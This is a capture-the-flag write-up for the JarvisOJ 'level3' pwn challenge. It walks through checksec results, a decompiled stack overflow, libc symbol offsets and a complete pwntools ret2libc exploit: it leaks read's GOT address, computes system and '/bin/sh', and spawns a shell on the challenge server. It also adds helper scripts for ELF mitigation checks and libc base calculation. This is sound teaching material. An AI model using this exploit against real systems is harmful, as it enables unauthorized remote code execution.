
Writeup of level3(Pwn) in JarvisOJ

Picking up the Pwn I had set aside for almost a month... (did Android reversing lure me away this month?)

Enough rambling; on to the challenge.

0x00 checksec

First thing after getting the files, run checksec; it gives the following:

root@<host>:~/Desktop/Pwn/level3# checksec level3
[*] '/root/Desktop/Pwn/level3/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
root@<host>:~/Desktop/Pwn/level3# checksec libc-2.19.so
[*] '/root/Desktop/Pwn/level3/libc-2.19.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

level3 has no canary, so a stack overflow can be exploited; the stack is non-executable (so shellcode is off the table); and PIE is off, so the binary's own addresses are fixed. libc-2.19.so, on the other hand, is position independent and will be loaded at a randomized address.
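As an added example (not part of the writeup), here is where two of those checksec columns actually come from. "NX enabled" means the ELF carries a PT_GNU_STACK program header without the PF_X flag, so the kernel maps the stack non-executable; "PIE" means the ELF type is ET_DYN rather than ET_EXEC. The canary column needs the dynamic symbol table (a reference to __stack_chk_fail), which this minimal parser deliberately does not read. The ELF images it is tested on are constructed in build_elf32(); inspect_file() runs the same check on a real file such as level3.

```python
"""
Added example, not from the writeup: read the "NX" and "PIE" mitigations
straight out of an ELF32 header, the way checksec does.
"""
import struct

ET_EXEC, ET_DYN = 2, 3
EM_386 = 3
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

EHDR_FMT = "<HHIIIIIHHHHHH"   # ELF32 header fields after the 16-byte e_ident
PHDR_FMT = "<IIIIIIII"        # ELF32 program header (8 x 32-bit fields)


def parse_elf32(data):
    """Return e_type and a list of (p_type, p_flags) for every program header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1:  # EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64
        raise ValueError("only 32-bit ELF handled here")
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = struct.unpack_from(EHDR_FMT, data, 16)
    phdrs = []
    for i in range(e_phnum):
        fields = struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        phdrs.append((fields[0], fields[6]))  # (p_type, p_flags)
    return e_type, phdrs


def mitigations(data):
    """Dict with the NX and PIE verdicts for one ELF32 image."""
    e_type, phdrs = parse_elf32(data)
    # No PT_GNU_STACK header at all means the loader falls back to an executable stack.
    nx = False
    for p_type, p_flags in phdrs:
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN}


def inspect_file(path):
    with open(path, "rb") as f:
        return mitigations(f.read())


def build_elf32(e_type, stack_flags=None):
    """Constructed minimal ELF32 image: header plus, if stack_flags is given, one PT_GNU_STACK header."""
    phdrs = b""
    if stack_flags is not None:
        phdrs = struct.pack(PHDR_FMT, PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # 32-bit, little-endian, version 1, SYSV ABI
    ehdr = e_ident + struct.pack(EHDR_FMT, e_type, EM_386, 1, 0x8048000,
                                 52 if phdrs else 0, 0, 0, 52, 32, 1 if phdrs else 0, 0, 0, 0)
    return ehdr + phdrs


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, inspect_file(path))
```

Run it as `python3 elfcheck.py ./level3 ./libc-2.19.so` to get the same NX/PIE verdicts as checksec for the two files above; the constructed images in build_elf32() are only there so the logic can be exercised without a binary on disk.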

0x01 exp logic

Open level3 in IDA and look at the program logic:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}
ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-88h]@1   0x88 bytes below the saved ebp

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u); // reads up to 0x100 bytes into a 0x88-byte buffer: stack overflow
}


After entering main, vulnerable_function is called first, and the key point is that it calls read. So Step 1 should be to build a stack overflow through read. The goal of the overflow is to run system("/bin/sh"), but an Alt+T search found neither that function nor the string. Lost...

Then I remembered a senior saying that once you know the address of read or write inside libc you can derive system from it, and it started to click...

The ELF and libc.so should both be loaded into memory while the ELF is running, so Step 2 should be to obtain, through a series of operations, the absolute addresses of system and /bin/sh in memory for that particular run (that series of operations... really had me stuck for quite a while... fortunately I found some expert's writeup... and finally got the idea straight). As for Step 3... overwriting the return address, the beginner's routine.

  • Step 1: build a stack overflow through the read in vulnerable_function and overwrite the return address with the address of write in the PLT
  • Step 2: use write to leak the absolute address of read in memory, then call vulnerable_function again (PS: the GOT entry for read holds read's real address in memory)
  • Step 3: compute the absolute addresses of system and /bin/sh, then build another stack overflow through vulnerable_function to overwrite the return address
  • Success

0x02 exp script

Before writing the script, do the preparation: for example, run readelf over the .so and search for the few key functions and the string (in the output below, the symbol names that are not used later are shown as <symbol>):

root@<host>:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so | grep "read@"
   571: 000daf60   125 FUNC    WEAK   DEFAULT   12 <symbol>@@GLIBC_2.0
   705: 0006f220    50 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1166: 000e0c40  1461 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
  1263: 000ec390    46 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.7
  1698: 000643a0   259 FUNC    WEAK   DEFAULT   12 <symbol>@@GLIBC_2.0
  2181: 000c3030   204 FUNC    WEAK   DEFAULT   12 <symbol>@@GLIBC_2.1
  2300: 000643a0   259 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
root@<host>:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so | grep "system@"
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
root@<host>:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so | grep "exit@"
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
   554: 000b5f24    24 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
   609: 0011c2a0    56 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.1.3
  1037: 00126800    60 FUNC    GLOBAL DEFAULT   12 <symbol>@GLIBC_2.0
  1492: 000f9160    62 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 <symbol>@@GLIBC_2.0
  2386: 000f9cd0     2 FUNC    GLOBAL DEFAULT   12 <symbol>@@GLIBC_2.2
root@<host>:~/Desktop/Pwn/level3# strings -a -t x ./libc-2.19.so | grep "/bin/sh"
 16084c /bin/sh

After filtering, we are left with:

   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
 16084c /bin/sh

Then write the exploit:
from pwn import *

r = remote('pwn2.jarvisoj.com', 9879)
e = ELF('./level3')

plt_write = e.plt['write']
got_read = e.got['read']
vulfuncadr = e.symbols['vulnerable_function']
# Arguments for write(1, got_read, 4): dump the 4-byte pointer stored in read's GOT entry
plt_write_args = p32(0x01) + p32(got_read) + p32(0x04)
# Stack layout after the overflow: 0x88 bytes of buffer + 4 bytes of saved ebp,
# then the return address (write@plt), then write's own return address
# (vulnerable_function, which gives us a second overflow), then write's arguments
payload1 = b'A' * (0x88 + 0x4) + p32(plt_write) + p32(vulfuncadr) + plt_write_args

r.recv()
r.send(payload1)
readadr = u32(r.recv(4))  # leaked absolute address of read (exactly 4 bytes)

#   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
#  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
#   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
# 16084c /bin/sh

libc_read = 0x000DAF60
offset = readadr - libc_read  # libc load base for this run
sysadr = offset + 0x00040310  # absolute address of system
xitadr = offset + 0x00033260  # absolute address of exit
bshadr = offset + 0x0016084C  # absolute address of "/bin/sh"
# Second overflow: return into system("/bin/sh"), with exit as system's return address
payload2 = b'A' * (0x88 + 0x4) + p32(sysadr) + p32(xitadr) + p32(bshadr)

r.send(payload2)
r.interactive()

OK, the server is pwned, 23333. Now go get the flag: just cat flag.
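The arithmetic in Steps 2 and 3 and in the script above, pulled out as an added example (not the writeup's code) with the sanity check a practitioner would want. ASLR moves libc as one block, so the leaked runtime address of read minus read's offset inside libc-2.19.so (from readelf) is the library's load base, and every other symbol lives at base plus its own file offset; that is why one leaked pointer is enough to locate system and "/bin/sh". Shared objects are mapped on page boundaries, so a computed base that is not page aligned means the leak did not come from the libc build the offsets were taken from. The readelf rows are the three filtered ones from this writeup; the leaked value is a constructed sample.

```python
"""
Added example, not the writeup's code: turn a leaked read address into the
libc base and the absolute addresses of the other symbols, with a
page-alignment check on the result.
"""
import re

# Filtered `readelf -s` rows from the writeup (symbol names restored).
READELF_ROWS = """\
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
"""
# From: strings -a -t x ./libc-2.19.so | grep "/bin/sh"
BINSH_OFFSET = 0x16084c

# Num: Value Size Type Bind Vis Ndx Name  (the name is taken up to the version separator "@")
ROW_RE = re.compile(r"^\s*\d+:\s+([0-9a-fA-F]+)\s+\d+\s+FUNC\s+\S+\s+\S+\s+\S+\s+([^@\s]+)@")


def parse_readelf_symbols(text):
    """Map function name -> offset within the library for the FUNC rows of readelf output."""
    offsets = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            offsets[m.group(2)] = int(m.group(1), 16)
    return offsets


def libc_base_from_leak(leaked, symbol_offset):
    """Load base = runtime address - file offset; shared objects are mapped page-aligned."""
    base = leaked - symbol_offset
    if base & 0xfff:
        raise ValueError("leak %#x minus offset %#x is not page aligned: wrong libc build?"
                         % (leaked, symbol_offset))
    return base


def resolve(leaked_read, offsets):
    """Absolute addresses of the symbols the writeup uses, derived from one leaked read pointer."""
    base = libc_base_from_leak(leaked_read, offsets["read"])
    return {
        "base": base,
        "system": base + offsets["system"],
        "exit": base + offsets["exit"],
        "binsh": base + BINSH_OFFSET,
    }


if __name__ == "__main__":
    leaked_read = 0xf75d6f60  # constructed sample leak (corresponds to base 0xf74fc000)
    for name, addr in resolve(leaked_read, parse_readelf_symbols(READELF_ROWS)).items():
        print("%-6s %#010x" % (name, addr))
```

The ValueError path is the useful part when things go wrong: if the remote side runs a different libc build than the one you took offsets from, the computed base will almost always fail the alignment check, which tells you to go find the right libc before anything else.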

0x03 Notes
